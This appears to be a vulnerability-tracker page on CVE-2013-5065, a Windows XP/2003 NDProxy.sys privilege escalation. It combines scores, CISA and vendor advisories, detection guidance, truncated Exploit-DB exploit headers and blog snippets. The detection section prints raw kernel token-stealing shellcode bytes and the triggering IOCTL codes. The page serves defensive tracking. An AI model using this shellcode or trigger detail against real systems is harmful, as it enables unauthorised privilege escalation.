CVE-2013-5065
published 2013-11-28CVE-2013-5065: NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited…
PriorityP180high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-03-24
Exploited in the wild
EPSS
34.89%
98.2th percentile
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3
bytes↗
\x90\x90\x90...\x3C\x00\x00\x00\x90\x90\x90\x90\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3
bytes↗
\x90\x90\x90...\x3C\x00\x00\x00\x90\x90\x90\x90\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3
- →Monitor for DeviceIoControl calls to the \.\ NDProxy device using IOCTL codes 0x8fff23cc or 0x8fff23c8 from user-mode processes, which is the trigger mechanism for this exploit. ↗
- →Detect NtAllocateVirtualMemory calls mapping memory at or near address 0x00000001 (null page / low memory allocation) — a prerequisite for the NULL pointer dereference exploitation technique used by this exploit. ↗
- →Alert on CreateFile handles opened against \\.\NDProxy from non-system, non-RAS processes, especially combined with subsequent DeviceIoControl calls. ↗
- →Turla/Waterbug threat actor exploited CVE-2013-5065 via specially crafted emails with malicious attachments and compromised websites; correlate NDProxy exploitation with spear-phishing or watering-hole initial access indicators. ↗
- →Absence of patch KB2914368 is a prerequisite for exploitation; use vulnerability scanning or WMIC to identify unpatched Windows XP SP3 / Server 2003 SP2 x86 systems. ↗
- ·The exploit only supports 32-bit (x86) targets; running against WOW64 or native 64-bit systems will fail. Detection logic should account for architecture. ↗
- ·The exploit input buffer uses a magic value at offset 20 (0x7030125 / 0x25010307) and a size field of 0x34; these specific values in a DeviceIoControl input buffer of length 0x54 are a reliable detection artifact. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gmpw-376j-24w5: NDProxy
ghsa_unreviewed·2022-05-14
CVE-2013-5065 [HIGH] CWE-20 GHSA-gmpw-376j-24w5: NDProxy
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
VulnCheck
Microsoft Windows Kernel Privilege Escalation Vulnerability
vulncheck·2013·CVSS 7.8
CVE-2013-5065 [HIGH] CWE-20 Microsoft Windows Kernel Privilege Escalation Vulnerability
Microsoft Windows Kernel Privilege Escalation Vulnerability
Microsoft Windows NDProxy.sys in the kernel contains an improper input validation vulnerability which can allow a local attacker to escalate privileges.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2013-5065; https://learn.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-002; https://securelist.com/the-epic-turla-operation/65545/; https://www.recordedfuture.com/russian-apt-toolkits; https://dl.acm.org/doi/pdf/10.1145/3465481.3465758; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Turla_c9c7d8ed38.pdf
Remediation Due: 2
CISA
Microsoft Windows Kernel Privilege Escalation Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2013-5065 [HIGH] CWE-20 Microsoft Windows Kernel Privilege Escalation Vulnerability
Vulnerability: Microsoft Windows Kernel Privilege Escalation Vulnerability
Affected: Microsoft Windows
Microsoft Windows NDProxy.sys in the kernel contains an improper input validation vulnerability which can allow a local attacker to escalate privileges.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2013-5065
Remediation Due Date: 2022-03-24
No detection rules found.
Exploit-DB
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
exploitdb·2015-08-07
CVE-2013-5065 Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
---
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call m
Exploit-DB
Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)
exploitdb·2013-12-17
CVE-2013-5065 Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)
Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
to access an array unsafely, and the value is used to perform a call, leading to a NULL
pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
module
Exploit-DB
Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
exploitdb·2013-12-03·CVSS 7.8
CVE-2013-5065 [HIGH] Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
---
# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
from ctypes import *
from ctypes.wintypes import *
import os, sys
kernel32 = windll.kernel32
ntdll = windll.ntdll
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
NULL = 0x0
OPEN_EXISTING = 0x3
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_FREE = 0x00010000
PAGE_EXECUTE_READWRITE
Trendmicro
Examining the Activities of the Turla APT Group
blogs_trendmicro·2023-09-22·CVSS 9.8
[CRITICAL] Examining the Activities of the Turla APT Group
APT & Targeted Attacks
# Examining the Activities of the Turla APT Group
We examine the campaigns of the cyberespionage group known as Turla over the years, with a special focus on the key MITRE techniques and the corresponding IDs associated with the threat actor group.
By: Srivathsa Sharma
2023/09/22
Read time: ( words)
Save to Folio
In this blog entry, we examine the campaigns of the cyberespionage group known as Turla over the years, with a special focus on the key MITRE techniques and the corresponding IDs associated with the threat actor group.
An introduction to Turla
Regarded as a highly sophisticated advanced persistent threat (APT) group, the Russian-based Turla has been suspected to be operational since at least 2004.
Turla’s group names are infamously titled after its
Talos
Microsoft Update Tuesday: January 2014, fix for the XP/2003 0-day vulnerability
blogs_talos·2014-01-14·CVSS 9.8
CVE-2014-0258 [CRITICAL] Microsoft Update Tuesday: January 2014, fix for the XP/2003 0-day vulnerability
The first Microsoft Update Tuesday of 2014 is here and it’s a very light month this time around. We’ve got 4 bulletins covering 6 CVEs. What’s remarkable is that there’s no Internet Explorer bulletin this month. There are also no bulletins that are marked critical, all 4 bulletins are marked as important.
The first bulletin, MS14-001, is for Word and Office Web Apps, this bulletin covers 3 CVEs (CVE-2014-0258, CVE-2014-0259 and CVE-2014-0260. They are memory corruption vulnerabilities in Word, which could result in remote code execution.
MS14-002 is a fix for the Windows XP/2003 0-day kernel escalation of privilege vulnerability (CVE-2013-5065) that was being exploited in the wild in tandem with the Adobe Reader vulnerability (CVE-2013-3346). Here an attacker would convince the user to o
Talos
Microsoft Update Tuesday: January 2014, fix for the XP/2003 0-day vulnerability
blogs_talos·2014-01-14·CVSS 9.8
CVE-2014-0258 [CRITICAL] Microsoft Update Tuesday: January 2014, fix for the XP/2003 0-day vulnerability
## Microsoft Update Tuesday: January 2014, fix for the XP/2003 0-day vulnerability
The first Microsoft Update Tuesday of 2014 is here and it’s a very light month this time around. We’ve got 4 bulletins covering 6 CVEs. What’s remarkable is that there’s no Internet Explorer bulletin this month. There are also no bulletins that are marked critical, all 4 bulletins are marked as important.
The first bulletin, MS14-001 , is for Word and Office Web Apps, this bulletin covers 3 CVEs ( CVE-2014-0258 , CVE-2014-0259 and CVE-2014-0260 . They are memory corruption vulnerabilities in Word, which could result in remote code execution.
MS14-002 is a fix for the Windows XP/2003 0-day kernel escalation of privilege vulnerability ( CVE-2013-5065 ) that was being exploited in the wild in tandem with the
Talos
Microsoft Update Tuesday: December 2013, some 0-day fixes
blogs_talos·2013-12-10·CVSS 5.5
CVE-2013-5045 [MEDIUM] Microsoft Update Tuesday: December 2013, some 0-day fixes
## Microsoft Update Tuesday: December 2013, some 0-day fixes
Microsoft’s final update for the year brings us 11 bulletins covering 24 CVE issues.
As is customary, there is the critical IE bulletin, MS13-097 . This time it covers 7 CVE issues. As in other months, this includes a number of use-after-free issues that we’ve come to expect in IE. However this month we also get 2 escalation of privilege vulnerabilities ( CVE-2013-5045 and CVE-2013-5046 ), where an attacker could break out of the low integrity sandbox. This assumes of course that the attacker has first gained remote code execution through another vulnerability and then uses one of these vulnerabilities to execute arbitrary programs.
There is also a critical update for GDI+, MS13-096 . This one fixes the 0-day vulnerability ( C
Talos
Microsoft Update Tuesday: December 2013, some 0-day fixes
blogs_talos·2013-12-10·CVSS 5.5
CVE-2013-5045 [MEDIUM] Microsoft Update Tuesday: December 2013, some 0-day fixes
Microsoft’s final update for the year brings us 11 bulletins covering 24 CVE issues.
As is customary, there is the critical IE bulletin, MS13-097. This time it covers 7 CVE issues. As in other months, this includes a number of use-after-free issues that we’ve come to expect in IE. However this month we also get 2 escalation of privilege vulnerabilities (CVE-2013-5045 and CVE-2013-5046), where an attacker could break out of the low integrity sandbox. This assumes of course that the attacker has first gained remote code execution through another vulnerability and then uses one of these vulnerabilities to execute arbitrary programs.
There is also a critical update for GDI+, MS13-096. This one fixes the 0-day vulnerability (CVE-2013-3906) that is being exploited in the wild. The vulnerabilit
Zscaler
Zscaler found Multiple Security Vulnerabilities | 12-10-2013
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 12-10-2013
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Zscaler
Zscaler Protects against Vulnerability in Windows Kernel which allows Elevation of Privileges | Zscaler
blogs_zscaler·CVSS 7.8
[HIGH] Zscaler Protects against Vulnerability in Windows Kernel which allows Elevation of Privileges | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
http://technet.microsoft.com/security/advisory/2914486http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-002https://www.exploit-db.com/exploits/37732/http://technet.microsoft.com/security/advisory/2914486http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-002https://www.exploit-db.com/exploits/37732/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2013-5065
2013-11-28
Published
2022-03-03
Added to CISA KEV
Exploited in the wild